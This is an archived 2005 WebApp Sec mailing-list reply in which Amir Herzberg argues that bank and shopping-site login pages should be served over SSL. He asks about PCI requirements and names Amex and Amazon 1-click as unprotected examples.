Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

webappsec logo WebApp Sec mailing list archives

Re: Should login pages be protected by SSL?
From: Amir Herzberg <herzbea () macs biu ac il>
Date: Tue, 21 Jun 2005 12:07:34 +0200
Andrew van der Stock wrote:

Depends on the value of the system in use.


...
OTOH, where the login leads to private data, such as your name and address, I feel that corporations have a duty of care to protect your data under the various privacy acts around the world. The cost of a certificate is much less than potential litigation, or more to the point, reputation loss if someone discovers a way around it.
I agree, and indeed, my focus in on really sensitive sites esp. banks. So it seems we are in agreement. I think most (or all??) security experts really agree here, but since some of the companies object, I am interested to see if there are some serious defenses of the unprotected login practice.
However, if it's a shopping cart type of thing, like Amazon, the thing that should be SSL is not the browsing of goods, but the transactions, particularly the credit card and address details. 
Agreed...
The Visa/MC PCI guidelines are quite stringent on applying reasonable controls to this data.
Well, actually, I've worked with the card people a lot but am not aware of a specific requirement to use SSL to protect the form sent to the consumer and not just to protect the CC# in transit. Do you know? If you can give me some reference, I'll appreciate. I can also ask my contacts. I am very interested, as one of the companies which uses unprotected login is Amex, and in fact we had a long argument with them on these questions...
In the case of Amazon 1-click, then effectively the 1-click is the thing requiring protection, so some form of control around that is also required.
Well, it is unfortunate that the 1-click login in Amazon is unprotected, see http://AmirHerzberg.com/shame.html... 
<skip>
--
Best regards,

Amir Herzberg

Associate Professor
Department of Computer Science
Bar Ilan University
http://AmirHerzberg.com
New: see my Hall Of Shame of Unprotected Login pages: http://AmirHerzberg.com/shame.html

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]